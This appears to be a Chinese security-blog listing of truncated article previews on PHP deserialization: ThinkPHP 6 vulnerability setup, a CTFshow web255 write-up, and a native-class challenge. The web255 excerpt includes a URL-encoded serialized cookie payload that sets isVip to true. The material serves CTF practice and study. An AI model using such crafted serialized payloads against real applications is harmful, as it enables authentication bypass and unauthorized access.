免责声明：        本文内容旨在提供有关特定漏洞或安全漏洞的信息，以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步，并非出于任何恶意目的。阅读者应该明白，在利用本文提到的漏洞信息或进行相关测试时，可能会违反某些法律法规

thinkPHP6反序列化thinkPHPv6.0.0-6.0.3环境搭建新版v6基于PHP7.1+开发php-7.3.4ThinkPHPv6.0.3使用composer进行安装composercreate-projecttopthink/think=6.0.3tp6.0然后利用phpstudy打开框架，简单配置如下子，再同样的道理配置phpstorm的调试。但是万事

反序列化刷题web255将isvip改为true然后序列化echourlencode($v=serialize($f=newctfShowUser()));Cookie：O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3

原生类反序列化<?phperror_reporting(0);classSYCLOVER{public$syc;public$lover;publicfunction__wakeup(){if(($this->syc!=$this->lover)&&(md5($this->syc)===md5($this->lover))&&(sha1($this->s